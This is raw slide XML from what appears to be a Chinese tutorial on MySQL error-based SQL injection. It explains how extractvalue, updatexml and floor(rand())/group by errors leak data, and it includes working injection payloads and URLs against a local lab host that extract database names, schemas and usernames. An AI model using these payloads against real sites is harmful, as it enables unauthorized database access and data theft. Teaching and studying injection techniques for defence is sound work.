              <a:t>mysql5.1.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开始提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>extractvalue和updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>两个函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>负责在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档中按照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语法查询节点内容，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>则负责修改查询到的内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当这两个函数在执行时，如果出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档路径错误就会产生报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024294" y="7664584"/>
            <a:ext cx="10057553" cy="53245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3CE72267-2EA5-FFF4-EF3F-91572059720A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B1C356D-BF01-A220-E96D-E9A3C659E227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2492961"/>
            <a:ext cx="21431968" cy="10002738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A.extractvalue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>extractvalue函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语法：extractvalue(xml_document,Xpath_string)，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第一个参数：xml_document是string格式，为xml文档对象的名称，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二个参数：Xpath_string是xpath格式的字符串，作用是从目标xml中返回包含所查询值的字符串。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二个参数是要求符合xpath语法的字符串，如果不满足要求，则会报错，并且将查询结果放在报错信息里，因此可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pyload：id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>='and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>("anything",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>('~',(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>))))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="825500" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>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p>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indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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查询当前数据库名和所有数据库名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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <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database()),'^')) --+  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>://127.0.0.1/cepo/?id=1’ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(1,concat('^',(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ),'^')) --+  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="825500" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询数据库个数和数据库名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group_concat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(username) from users),'^'))--+ </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cepo</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username from users limit 0,1),'^'))--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="825500" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="825500" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>除了显示方式的构造语句不一样，脱库过程和联合查询基本一致。</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其中</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可以换成</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等不满足xpath格式的字符</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()能查询字符串的最大长度为32，如果我们想要的结果超过32，就要用substring()函数截取或limit分页，一次查看最多32位</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="825500" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114222617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229D9192-BC5A-7D07-A7BB-A4A92228F0CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2668649"/>
            <a:ext cx="21452234" cy="5262979"/>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B.</a:t>
            </a:r>
            <a:r>
              <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正常语法：updatexml(xml_document,xpath_string,new_value)，</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第一个参数：xml_document是string格式，为xml文档对象的名称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第二个参数：xpath_string是xpath格式的字符串，</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第三个参数：new_value是string格式，替换查找到的负荷条件的数据，作用是改变文档中符合条件的节点的值。</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第二个参数跟extractvalue函数的第二个参数一样，因此也可以利用，且利用方式相同</a:t>
            </a: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payload：id='and(select updatexml("anything",concat('~',(select语句())),"anything"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="825500" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>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tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询数据库名：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tabLst/>
              <a:defRPr/>
            </a:pP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schema_name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from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information_schema.schemata</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limit 2,1),'^'),1) --+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA829A1A-7A78-F96C-2205-32B0EAE1A678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26685932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124754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>concat+rand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>group_by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>导致主键重复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这种报错方法的本质是因为floor(rand(0)*2)的重复性，导致group by语句出错。实际上只要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>rand()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>group by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>三个连用就会造成这种报错，与位置无关：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	group by key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的原理是循环读取数据的每一行，将结果保存于临时表中。读取每一行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存在于临时表中，则不在临时表中更新临时表的数据；如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不在临时表中，则在临时表中插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
